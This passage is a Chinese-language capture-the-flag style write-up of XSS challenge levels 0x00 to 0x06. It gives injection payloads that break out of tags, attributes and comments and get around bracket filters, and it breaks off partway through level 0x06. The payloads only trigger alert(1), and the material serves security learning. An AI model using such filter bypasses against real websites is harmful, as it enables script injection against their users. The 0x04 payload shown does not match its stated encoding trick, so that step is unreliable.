XSS Challenges:地址
0x00
<script>alert(1)</script>
0x01
</textarea><script>alert(1)</script>
0x02
"><script>alert(1)</script><img src="
0x03
括号被过滤,用反引号绕过
<script>alert`1`</script>
0x04
function render (input) {
const stripBracketsRe = /[()`]/g
input = input.replace(stripBracketsRe, '')
return input
}
括号和反引号都被过滤,所以要想办法,可以用html编码绕过
<img src="x" onerror="alert(1)">
0x05
--!><script>alert(1)</script>
0x06
要绕过一个正则将js代码插入到html标签中
function render (input) {
i